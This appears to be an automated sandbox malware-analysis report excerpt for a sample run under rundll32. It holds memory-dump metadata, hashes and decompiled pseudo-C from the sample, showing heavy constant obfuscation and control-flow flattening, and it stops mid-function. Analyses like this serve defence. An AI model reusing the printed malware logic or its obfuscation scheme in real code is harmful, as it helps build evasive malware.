                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #Q$.=C$:Q$Sq$W}$\$l${V$5I[
                                                                      • API String ID: 0-1292055276
                                                                      • Opcode ID: 58e62d4f04a5a3e9ff4557222e72bf4488030016b1e1191806747f2306f669db
                                                                      • Instruction ID: 24269de30635efd03f6eb3de9924c2187159abaf21d31e55c173ad5a7e5d4e70
                                                                      • Opcode Fuzzy Hash: 58e62d4f04a5a3e9ff4557222e72bf4488030016b1e1191806747f2306f669db
                                                                      • Instruction Fuzzy Hash: 17C112724083809FE369CF65C98995FFBF1BB84748F504A1DF1A5962A0D7BA9908CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #Q$.=C$:Q$Sq$W}$\$l${V$5I[
                                                                      • API String ID: 0-1292055276
                                                                      • Opcode ID: 27dfc40b911172738d26ce027ea30d5c4c5eb83b91f10e379745cced135b0954
                                                                      • Instruction ID: a4712450b43bc4f47edf83d080b4ef7137923642f538b1fd60409dbffc063410
                                                                      • Opcode Fuzzy Hash: 27dfc40b911172738d26ce027ea30d5c4c5eb83b91f10e379745cced135b0954
                                                                      • Instruction Fuzzy Hash: 12C112724083809FE369CF65C58954BFBF1BB85748F504A1DF1A6962A0D7B98918CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E0200C6D9(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				signed int _v4;
                                                                      				intOrPtr* _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				void* __ecx;
                                                                      				void* _t252;
                                                                      				void* _t281;
                                                                      				intOrPtr _t284;
                                                                      				void* _t289;
                                                                      				void* _t293;
                                                                      				short _t294;
                                                                      				signed int _t295;
                                                                      				signed int _t296;
                                                                      				void* _t298;
                                                                      				intOrPtr* _t340;
                                                                      				signed int _t341;
                                                                      				signed int _t342;
                                                                      				signed int _t343;
                                                                      				signed int _t344;
                                                                      				signed int _t345;
                                                                      				signed int _t346;
                                                                      				signed int _t347;
                                                                      				signed int _t348;
                                                                      				signed int _t349;
                                                                      				signed int _t350;
                                                                      				signed int _t351;
                                                                      				signed int _t352;
                                                                      				signed int _t353;
                                                                      				signed int _t354;
                                                                      				signed int _t357;
                                                                      				signed int* _t359;
                                                                      				void* _t361;
                                                                      
                                                                      				_push(_a4);
                                                                      				_t340 = __edx;
                                                                      				_push(__edx);
                                                                      				_v8 = __edx;
                                                                      				E02002550(_t252);
                                                                      				_v12 = _v12 & 0x00000000;
                                                                      				_t359 =  &(( &_v104)[3]);
                                                                      				_v36 = 0x3d9b;
                                                                      				_v36 = _v36 + 0x87e4;
                                                                      				_t298 = 0xa757dfd;
                                                                      				_v36 = _v36 ^ 0x00003896;
                                                                      				_v16 = 0xa1a2;
                                                                      				_t344 = 0x7e;
                                                                      				_v16 = _v16 / _t344;
                                                                      				_v16 = _v16 ^ 0x00005f0b;
                                                                      				_v20 = 0xd4a;
                                                                      				_v20 = _v20 ^ 0x823c7950;
                                                                      				_v20 = _v20 ^ 0x823c4fb0;
                                                                      				_v80 = 0x8dd3;
                                                                      				_v80 = _v80 + 0xffff84c4;
                                                                      				_t345 = 0x3a;
                                                                      				_v80 = _v80 / _t345;
                                                                      				_t346 = 0xf;
                                                                      				_v80 = _v80 / _t346;
                                                                      				_v80 = _v80 ^ 0x00002598;
                                                                      				_v84 = 0x28b2;
                                                                      				_v84 = _v84 ^ 0xae38f700;
                                                                      				_t347 = 0x16;
                                                                      				_v84 = _v84 * 0x2b;
                                                                      				_v84 = _v84 >> 4;
                                                                      				_v84 = _v84 ^ 0x0438ce96;
                                                                      				_v100 = 0xb16b;
                                                                      				_v100 = _v100 << 2;
                                                                      				_v100 = _v100 ^ 0x3a2fdb23;
                                                                      				_v100 = _v100 / _t347;
                                                                      				_v100 = _v100 ^ 0x02a4abe7;
                                                                      				_v32 = 0x883d;
                                                                      				_v32 = _v32 << 7;
                                                                      				_v32 = _v32 ^ 0x00442a4b;
                                                                      				_v92 = 0xca89;
                                                                      				_v92 = _v92 << 0xe;
                                                                      				_v92 = _v92 + 0x8a44;
                                                                      				_t348 = 0x29;
                                                                      				_v92 = _v92 / _t348;
                                                                      				_v92 = _v92 ^ 0x013c4aa7;
                                                                      				_v52 = 0x404;
                                                                      				_t349 = 0x6a;
                                                                      				_v52 = _v52 / _t349;
                                                                      				_v52 = _v52 + 0xffff84cc;
                                                                      				_v52 = _v52 ^ 0xffffb1d7;
                                                                      				_v96 = 0x1382;
                                                                      				_v96 = _v96 ^ 0xdda77c38;
                                                                      				_v96 = _v96 << 2;
                                                                      				_t350 = 0x21;
                                                                      				_v96 = _v96 / _t350;
                                                                      				_v96 = _v96 ^ 0x03984523;
                                                                      				_v28 = 0x72c9;
                                                                      				_v28 = _v28 + 0xc1ec;
                                                                      				_v28 = _v28 ^ 0x000116d9;
                                                                      				_v88 = 0xe360;
                                                                      				_v88 = _v88 << 1;
                                                                      				_v88 = _v88 >> 3;
                                                                      				_v88 = _v88 + 0xffffdc99;
                                                                      				_v88 = _v88 ^ 0x00002bb3;
                                                                      				_v24 = 0xb27;
                                                                      				_v24 = _v24 | 0x54af4a27;
                                                                      				_v24 = _v24 ^ 0x54af70c5;
                                                                      				_v104 = 0x20e9;
                                                                      				_v104 = _v104 ^ 0x30957c1a;
                                                                      				_v104 = _v104 >> 1;
                                                                      				_v104 = _v104 >> 0xa;
                                                                      				_v104 = _v104 ^ 0x000644e5;
                                                                      				_v60 = 0x5e02;
                                                                      				_v60 = _v60 << 0xc;
                                                                      				_t351 = 0x6b;
                                                                      				_t295 = _v4;
                                                                      				_t357 = _v4;
                                                                      				_v60 = _v60 * 0x29;
                                                                      				_v60 = _v60 ^ 0xf0e520c4;
                                                                      				_v64 = 0x8dff;
                                                                      				_v64 = _v64 * 0x38;
                                                                      				_v64 = _v64 + 0x458e;
                                                                      				_v64 = _v64 ^ 0x001f749b;
                                                                      				_v40 = 0x5c65;
                                                                      				_v40 = _v40 / _t351;
                                                                      				_v40 = _v40 ^ 0x00006d1c;
                                                                      				_v72 = 0xc60a;
                                                                      				_v72 = _v72 + 0x70bb;
                                                                      				_v72 = _v72 << 9;
                                                                      				_v72 = _v72 ^ 0x026de662;
                                                                      				_v76 = 0x47c;
                                                                      				_v76 = _v76 + 0xffff5521;
                                                                      				_v76 = _v76 ^ 0xd2a60678;
                                                                      				_t352 = 0x14;
                                                                      				_t353 = _v4;
                                                                      				_v76 = _v76 / _t352;
                                                                      				_v76 = _v76 ^ 0x02446ded;
                                                                      				_v44 = 0xfc2b;
                                                                      				_v44 = _v44 + 0x96d4;
                                                                      				_v44 = _v44 ^ 0x17589983;
                                                                      				_v44 = _v44 ^ 0x17594bcd;
                                                                      				_v48 = 0xed74;
                                                                      				_v48 = _v48 + 0x9236;
                                                                      				_v48 = _v48 ^ 0x53004543;
                                                                      				_v48 = _v48 ^ 0x53013ae9;
                                                                      				_v56 = 0x1029;
                                                                      				_v56 = _v56 << 8;
                                                                      				_v56 = _v56 ^ 0x46c265d9;
                                                                      				_v56 = _v56 ^ 0x46d24cd9;
                                                                      				_v68 = 0xb47b;
                                                                      				_v68 = _v68 + 0x930f;
                                                                      				_v68 = _v68 | 0xf81d1365;
                                                                      				_v68 = _v68 ^ 0xf81d57ef;
                                                                      				while(1) {
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t361 = _t298 - 0x16ae89bd;
                                                                      						if(_t361 <= 0) {
                                                                      							break;
                                                                      						}
                                                                      						if(_t298 == 0x1dc5383f) {
                                                                      							E01FF2DDF(_v16,  &_v12, _v20, E02009B4A);
                                                                      							_t298 = 0x3a204f2b;
                                                                      							goto L25;
                                                                      						} else {
                                                                      							if(_t298 == 0x3a204f2b) {
                                                                      								_t353 = _v48;
                                                                      								_t342 = _v12;
                                                                      								_v4 = _t353;
                                                                      								if(_t342 != 0) {
                                                                      									do {
                                                                      										_t289 = E0200232B(_v80, _t342 + 0x1c, _v84);
                                                                      										_t342 =  *((intOrPtr*)(_t342 + 8));
                                                                      										_t353 = _t353 + 1 + _t289;
                                                                      									} while (_t342 != 0);
                                                                      									_v4 = _t353;
                                                                      									_t281 = 0x3afc2fec;
                                                                      								}
                                                                      								_t298 = 0x16ae89bd;
                                                                      								goto L19;
                                                                      							} else {
                                                                      								if(_t298 != _t281) {
                                                                      									L25:
                                                                      									if(_t298 != 0x1813df8a) {
                                                                      										continue;
                                                                      									} else {
                                                                      									}
                                                                      								} else {
                                                                      									_t295 = _v56;
                                                                      									_t343 = _v12;
                                                                      									if(_t343 != 0) {
                                                                      										do {
                                                                      											_t221 =  &_v28; // 0x442a4b
                                                                      											E020003F1(_v92, _v52, _t343 + 0x1c, _t295 * 2 + _t357, _v96,  *_t221);
                                                                      											_t293 = E0200232B(_v88, _t343 + 0x1c, _v24);
                                                                      											_t359 =  &(_t359[5]);
                                                                      											_t296 = _t295 + _t293;
                                                                      											_t294 = 0x2c;
                                                                      											 *((short*)(_t357 + _t296 * 2)) = _t294;
                                                                      											_t295 = _t296 + 1;
                                                                      											_t343 =  *((intOrPtr*)(_t343 + 8));
                                                                      										} while (_t343 != 0);
                                                                      										_t281 = 0x3afc2fec;
                                                                      									}
                                                                      									_t353 = _v4;
                                                                      									_t298 = 0x18c8122;
                                                                      									L19:
                                                                      									_t340 = _v8;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L30:
                                                                      						return 0 |  *_t340 != 0x00000000;
                                                                      					}
                                                                      					if(_t361 == 0) {
                                                                      						_push(_t298);
                                                                      						_t357 = E01FF54FB(_t353 + _t353);
                                                                      						_t281 = 0x3afc2fec;
                                                                      						_t298 =  !=  ? 0x3afc2fec : 0x3fa0ed8;
                                                                      						goto L2;
                                                                      					} else {
                                                                      						if(_t298 == 0x18c8122) {
                                                                      							 *(_t340 + 4) = _v68;
                                                                      							_t284 = E01FF7731(_t357, _t340 + 4, _v36, _v104, _v60, _v64, _t295 - 1);
                                                                      							_t359 =  &(_t359[5]);
                                                                      							 *_t340 = _t284;
                                                                      							_t298 = 0xfb62ecd;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t298 == 0x3fa0ed8) {
                                                                      								_t341 = _v12;
                                                                      								if(_t341 != 0) {
                                                                      									do {
                                                                      										_t354 =  *(_t341 + 8);
                                                                      										E01FFDE81(_v76, _t341, _v44);
                                                                      										_t341 = _t354;
                                                                      									} while (_t354 != 0);
                                                                      								}
                                                                      								_t340 = _v8;
                                                                      							} else {
                                                                      								if(_t298 == 0xa757dfd) {
                                                                      									_t298 = 0x1dc5383f;
                                                                      									goto L2;
                                                                      								} else {
                                                                      									if(_t298 != 0xfb62ecd) {
                                                                      										goto L25;
                                                                      									} else {
                                                                      										E01FFDE81(_v40, _t357, _v72);
                                                                      										_t298 = 0x3fa0ed8;
                                                                      										while(1) {
                                                                      											goto L2;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L30;
                                                                      				}
                                                                      			}

























































                                                                      0x0200cb1c
                                                                      0x0200cb1f
                                                                      0x0200cb23
                                                                      0x0200cb24
                                                                      0x0200cb29
                                                                      0x0200cb2a
                                                                      0x0200cb2d
                                                                      0x0200cb31
                                                                      0x0200cb31
                                                                      0x0200cb36
                                                                      0x0200cb3a
                                                                      0x0200cb3f
                                                                      0x0200cb3f
                                                                      0x00000000
                                                                      0x0200cb3f
                                                                      0x0200cad8
                                                                      0x0200cad4
                                                                      0x0200cbd8
                                                                      0x0200cbe6
                                                                      0x0200cbe6
                                                                      0x0200ca1f
                                                                      0x0200caa5
                                                                      0x0200caab
                                                                      0x0200caad
                                                                      0x0200caba
                                                                      0x00000000
                                                                      0x0200ca21
                                                                      0x0200ca27
                                                                      0x0200ca6e
                                                                      0x0200ca86
                                                                      0x0200ca8b
                                                                      0x0200ca8e
                                                                      0x0200ca90
                                                                      0x00000000
                                                                      0x0200ca29
                                                                      0x0200ca2f
                                                                      0x0200cbb3
                                                                      0x0200cbb9
                                                                      0x0200cbbb
                                                                      0x0200cbc5
                                                                      0x0200cbc8
                                                                      0x0200cbcd
                                                                      0x0200cbd0
                                                                      0x0200cbbb
                                                                      0x0200cbd4
                                                                      0x0200ca35
                                                                      0x0200ca3b
                                                                      0x0200ca60
                                                                      0x00000000
                                                                      0x0200ca3d
                                                                      0x0200ca43
                                                                      0x00000000
                                                                      0x0200ca49
                                                                      0x0200ca53
                                                                      0x0200ca59
                                                                      0x0200ca0e
                                                                      0x00000000
                                                                      0x0200ca0e
                                                                      0x0200ca0e
                                                                      0x0200ca43
                                                                      0x0200ca3b
                                                                      0x0200ca2f
                                                                      0x0200ca27
                                                                      0x00000000
                                                                      0x0200ca1f

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +O :$+O :$CE$J$K*D$`$e\$
                                                                      • API String ID: 0-1729304812
                                                                      • Opcode ID: 4de23f791581169294c9b4e33f21d45d106f6a5682f51ce4f228391888106c7d
                                                                      • Instruction ID: ca5d0da37b4b2b1d4e277c404bc98f46a55c0e12808426c0ce397e0088345e41
                                                                      • Opcode Fuzzy Hash: 4de23f791581169294c9b4e33f21d45d106f6a5682f51ce4f228391888106c7d
                                                                      • Instruction Fuzzy Hash: 1FD152715083419FE369CF26C48951BBBF2FBC4758F108A0EF696962A0D7B5C949CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +O :$+O :$CE$J$K*D$`$e\$
                                                                      • API String ID: 0-1729304812
                                                                      • Opcode ID: a4ea01c878fee7e1ce2c2fd3f59fe79c4fb56f583e482c284198a7485486c535
                                                                      • Instruction ID: b0d58ed9640e3d2d4a86663310a8ca4db3be502746f51f415775e6ab2f156ca4
                                                                      • Opcode Fuzzy Hash: a4ea01c878fee7e1ce2c2fd3f59fe79c4fb56f583e482c284198a7485486c535
                                                                      • Instruction Fuzzy Hash: CDD163711183419FD358CF29C88951BBBE2FBC4718F208A0EF596972A0DBB5D959CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E01FFC364() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				signed int _v1044;
                                                                      				signed int _v1048;
                                                                      				signed int _v1052;
                                                                      				signed int _v1056;
                                                                      				signed int _v1060;
                                                                      				unsigned int _v1064;
                                                                      				signed int _v1068;
                                                                      				signed int _v1072;
                                                                      				signed int _v1076;
                                                                      				signed int _v1080;
                                                                      				signed int _v1084;
                                                                      				signed int _v1088;
                                                                      				signed int _v1092;
                                                                      				signed int _v1096;
                                                                      				signed int _v1100;
                                                                      				signed int _v1104;
                                                                      				signed int _v1108;
                                                                      				signed int _v1112;
                                                                      				signed int _v1116;
                                                                      				signed int _v1120;
                                                                      				signed int _v1124;
                                                                      				signed int _v1128;
                                                                      				signed int _v1132;
                                                                      				signed int _v1136;
                                                                      				signed int _v1140;
                                                                      				signed int _v1144;
                                                                      				signed int _v1148;
                                                                      				signed int _v1152;
                                                                      				signed int _v1156;
                                                                      				signed int _v1160;
                                                                      				signed int _t323;
                                                                      				short* _t338;
                                                                      				void* _t343;
                                                                      				signed int _t347;
                                                                      				void* _t349;
                                                                      				signed int _t387;
                                                                      				signed int _t389;
                                                                      				signed int _t390;
                                                                      				signed int _t391;
                                                                      				signed int _t392;
                                                                      				signed int _t393;
                                                                      				signed int _t394;
                                                                      				signed int _t395;
                                                                      				signed int* _t398;
                                                                      
                                                                      				_t398 =  &_v1160;
                                                                      				_v1044 = 0xb4bf;
                                                                      				_t349 = 0x14e1bd3d;
                                                                      				_t347 = 0x32;
                                                                      				_v1044 = _v1044 / _t347;
                                                                      				_v1044 = _v1044 ^ 0x000063a2;
                                                                      				_v1120 = 0x1c18;
                                                                      				_v1120 = _v1120 << 2;
                                                                      				_v1120 = _v1120 ^ 0xbedc4282;
                                                                      				_v1120 = _v1120 ^ 0xbedc611c;
                                                                      				_v1096 = 0xe102;
                                                                      				_v1096 = _v1096 | 0x1f52717c;
                                                                      				_v1096 = _v1096 + 0x31d9;
                                                                      				_v1096 = _v1096 ^ 0x1f532ca5;
                                                                      				_v1112 = 0x173b;
                                                                      				_t389 = 0x5f;
                                                                      				_v1112 = _v1112 / _t389;
                                                                      				_v1112 = _v1112 | 0xb3fa1704;
                                                                      				_v1112 = _v1112 ^ 0xb3fa37e7;
                                                                      				_v1068 = 0x9869;
                                                                      				_t387 = 0x69;
                                                                      				_t390 = 0x53;
                                                                      				_v1068 = _v1068 * 0x43;
                                                                      				_v1068 = _v1068 ^ 0x0027b996;
                                                                      				_v1084 = 0xcfb9;
                                                                      				_v1084 = _v1084 >> 0xf;
                                                                      				_v1084 = _v1084 + 0x12c;
                                                                      				_v1084 = _v1084 ^ 0x000024ff;
                                                                      				_v1128 = 0x3cd5;
                                                                      				_v1128 = _v1128 | 0x566ade8e;
                                                                      				_v1128 = _v1128 >> 9;
                                                                      				_v1128 = _v1128 + 0xffff5a4b;
                                                                      				_v1128 = _v1128 ^ 0x002ae40f;
                                                                      				_v1104 = 0x6c2b;
                                                                      				_v1104 = _v1104 | 0x9ff8dffb;
                                                                      				_v1104 = _v1104 ^ 0x9ff8a878;
                                                                      				_v1056 = 0xffd2;
                                                                      				_v1056 = _v1056 + 0xffff840f;
                                                                      				_v1056 = _v1056 ^ 0x0000ebeb;
                                                                      				_v1152 = 0x1736;
                                                                      				_v1152 = _v1152 | 0x4cb32822;
                                                                      				_v1152 = _v1152 / _t387;
                                                                      				_v1152 = _v1152 + 0xb8cf;
                                                                      				_v1152 = _v1152 ^ 0x00bbe158;
                                                                      				_v1080 = 0x5ef;
                                                                      				_v1080 = _v1080 + 0xffff8539;
                                                                      				_v1080 = _v1080 / _t390;
                                                                      				_v1080 = _v1080 ^ 0x0315a6d4;
                                                                      				_v1048 = 0xf210;
                                                                      				_v1048 = _v1048 | 0xcb23d8d0;
                                                                      				_v1048 = _v1048 ^ 0xcb23a87f;
                                                                      				_v1144 = 0x90;
                                                                      				_t391 = 0x31;
                                                                      				_v1144 = _v1144 / _t391;
                                                                      				_v1144 = _v1144 + 0xffff80e0;
                                                                      				_t392 = 0x67;
                                                                      				_v1144 = _v1144 / _t392;
                                                                      				_v1144 = _v1144 ^ 0x027c3ad8;
                                                                      				_v1072 = 0xc5ae;
                                                                      				_t393 = 0x16;
                                                                      				_v1072 = _v1072 / _t393;
                                                                      				_t394 = 0x60;
                                                                      				_v1072 = _v1072 / _t394;
                                                                      				_v1072 = _v1072 ^ 0x00006ed7;
                                                                      				_v1136 = 0xa4ba;
                                                                      				_v1136 = _v1136 ^ 0xe75bfca7;
                                                                      				_t395 = 0x7b;
                                                                      				_v1136 = _v1136 * 0x5c;
                                                                      				_v1136 = _v1136 ^ 0xe80995ee;
                                                                      				_v1136 = _v1136 ^ 0xccda384c;
                                                                      				_v1156 = 0x7c9c;
                                                                      				_v1156 = _v1156 + 0xffffb410;
                                                                      				_v1156 = _v1156 + 0xfffffa49;
                                                                      				_v1156 = _v1156 >> 8;
                                                                      				_v1156 = _v1156 ^ 0x000056b1;
                                                                      				_v1160 = 0x84ff;
                                                                      				_v1160 = _v1160 ^ 0xed45694c;
                                                                      				_t148 =  &_v1160; // 0xed45694c
                                                                      				_v1160 =  *_t148 * 0x62;
                                                                      				_v1160 = _v1160 + 0xffff41d7;
                                                                      				_v1160 = _v1160 ^ 0xd4c40e06;
                                                                      				_v1092 = 0x1d87;
                                                                      				_v1092 = _v1092 << 8;
                                                                      				_v1092 = _v1092 ^ 0x7d24d215;
                                                                      				_v1092 = _v1092 ^ 0x7d392b35;
                                                                      				_v1060 = 0x93f7;
                                                                      				_v1060 = _v1060 + 0xffff7474;
                                                                      				_v1060 = _v1060 ^ 0x00001886;
                                                                      				_v1064 = 0xef31;
                                                                      				_v1064 = _v1064 >> 0x10;
                                                                      				_v1064 = _v1064 ^ 0x000047fd;
                                                                      				_v1148 = 0x11a7;
                                                                      				_v1148 = _v1148 | 0x5b5dfd11;
                                                                      				_v1148 = _v1148 << 6;
                                                                      				_v1148 = _v1148 + 0xffff2c3e;
                                                                      				_v1148 = _v1148 ^ 0xd77ed371;
                                                                      				_v1100 = 0x7077;
                                                                      				_v1100 = _v1100 / _t387;
                                                                      				_v1100 = _v1100 | 0x4c8a3f77;
                                                                      				_v1100 = _v1100 ^ 0x4c8a3283;
                                                                      				_v1140 = 0x668c;
                                                                      				_v1140 = _v1140 | 0x54be0880;
                                                                      				_v1140 = _v1140 + 0xd8b3;
                                                                      				_v1140 = _v1140 / _t395;
                                                                      				_v1140 = _v1140 ^ 0x00b05f67;
                                                                      				_v1076 = 0x11c3;
                                                                      				_v1076 = _v1076 >> 6;
                                                                      				_v1076 = _v1076 ^ 0x5bd60e39;
                                                                      				_v1076 = _v1076 ^ 0x5bd63952;
                                                                      				_v1124 = 0x5174;
                                                                      				_v1124 = _v1124 * 0x1a;
                                                                      				_v1124 = _v1124 + 0xffff3f27;
                                                                      				_t323 = _v1124;
                                                                      				_t381 = _t323 % _t347;
                                                                      				_v1124 = _t323 / _t347;
                                                                      				_v1124 = _v1124 ^ 0x00007b90;
                                                                      				_v1132 = 0x9c48;
                                                                      				_v1132 = _v1132 << 2;
                                                                      				_v1132 = _v1132 ^ 0x5e61e8c2;
                                                                      				_v1132 = _v1132 ^ 0xca6ca211;
                                                                      				_v1132 = _v1132 ^ 0x940f5e6e;
                                                                      				_v1052 = 0xbbfe;
                                                                      				_v1052 = _v1052 >> 0xc;
                                                                      				_v1052 = _v1052 ^ 0x00003fa7;
                                                                      				_v1108 = 0xdf34;
                                                                      				_v1108 = _v1108 * 0x2f;
                                                                      				_v1108 = _v1108 + 0xffff7f6f;
                                                                      				_v1108 = _v1108 ^ 0x0028118b;
                                                                      				_v1116 = 0x2c66;
                                                                      				_v1116 = _v1116 >> 2;
                                                                      				_v1116 = _v1116 ^ 0x28bea5fc;
                                                                      				_v1116 = _v1116 ^ 0x28beb247;
                                                                      				_v1088 = 0x89d3;
                                                                      				_v1088 = _v1088 >> 2;
                                                                      				_v1088 = _v1088 + 0xa943;
                                                                      				_v1088 = _v1088 ^ 0x0000f687;
                                                                      				do {
                                                                      					while(_t349 != 0x14e1bd3d) {
                                                                      						if(_t349 == 0x1c504520) {
                                                                      							E01FF3B74();
                                                                      							L9:
                                                                      							_t349 = 0x363d246c;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t349 == 0x1e34bac7) {
                                                                      							E01FFF4A2(_v1156, _t381, _v1160, _v1092,  &_v1040);
                                                                      							_push( &_v1040);
                                                                      							E01FF7571( &_v1040);
                                                                      							_t381 = _v1100;
                                                                      							E0200CBE7( &_v520, _v1100, __eflags, _v1140, _v1076,  &_v1040);
                                                                      							_t398 =  &(_t398[2]) - 0xc + 0x20;
                                                                      							_t349 = 0x2b0461c4;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t349 == 0x2b0461c4) {
                                                                      							_t338 = E01FFBDCC( &_v520, _v1124, _v1132, _v1052);
                                                                      							__eflags = 0;
                                                                      							 *_t338 = 0;
                                                                      							_t298 =  &_v1108; // 0x7d392b35
                                                                      							return E02005183( *_t298, _v1116, _v1088,  &_v520);
                                                                      						}
                                                                      						if(_t349 == 0x35103033) {
                                                                      							_t343 = E0200434E();
                                                                      							goto L9;
                                                                      						}
                                                                      						_t408 = _t349 - 0x363d246c;
                                                                      						if(_t349 != 0x363d246c) {
                                                                      							goto L15;
                                                                      						}
                                                                      						_push(0x1ff12d8);
                                                                      						_push(_v1128);
                                                                      						_push(_v1084);
                                                                      						E01FFA4D7(_t408, _v1056, _v1152, _v1080, _v1048, E01FF5DFC(_v1112, _v1068, _t408),  *0x2011088 + 0x254,  &_v520,  *0x2011088 + 0x38);
                                                                      						_t381 = _v1072;
                                                                      						_t273 =  &_v1144; // 0x7d392b35
                                                                      						_t343 = E02000D6D( *_t273, _v1072, _v1136, _t344);
                                                                      						_t398 =  &(_t398[0xd]);
                                                                      						_t349 = 0x1e34bac7;
                                                                      					}
                                                                      					__eflags =  *((intOrPtr*)( *0x2011088 + 0x244));
                                                                      					if(__eflags == 0) {
                                                                      						_t349 = 0x1c504520;
                                                                      						goto L15;
                                                                      					}
                                                                      					_t349 = 0x35103033;
                                                                      					continue;
                                                                      					L15:
                                                                      					__eflags = _t349 - 0xa5a6948;
                                                                      				} while (__eflags != 0);
                                                                      				return _t343;
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
                                                                      • API String ID: 0-3332840876
                                                                      • Opcode ID: b7d9e9567344569d3939ab082d7f42fa7cef3e3ad5959f6f42f5cb2225e089f5
                                                                      • Instruction ID: ebe90bca9cc710302e9001ab42eaa772df6a64a345b2aca40567c9bba843bcaf
                                                                      • Opcode Fuzzy Hash: b7d9e9567344569d3939ab082d7f42fa7cef3e3ad5959f6f42f5cb2225e089f5
                                                                      • Instruction Fuzzy Hash: 42E121715093418FE368CF25C58995FBBF1BFC4B18F50891DF2AA862A0D7B58A09CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
                                                                      • API String ID: 0-3332840876
                                                                      • Opcode ID: 59573d73a54ce591e743191370aa59263fa98defaa15bace4ac305a490d770c9
                                                                      • Instruction ID: 6f42ad4cce4d10a7ba040388781e653accc68cef8a43abd395d3d6394f83d15a
                                                                      • Opcode Fuzzy Hash: 59573d73a54ce591e743191370aa59263fa98defaa15bace4ac305a490d770c9
                                                                      • Instruction Fuzzy Hash: 42E131B05193418FD368CF25C58995FBBF1BBC4B18F50891DF2AA862A0C7B5CA19CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0200DBC4(void* __ecx) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				signed int _v12;
                                                                      				unsigned int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				unsigned int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				void* _t251;
                                                                      				void* _t256;
                                                                      				void* _t257;
                                                                      				void* _t258;
                                                                      				void* _t263;
                                                                      				void* _t268;
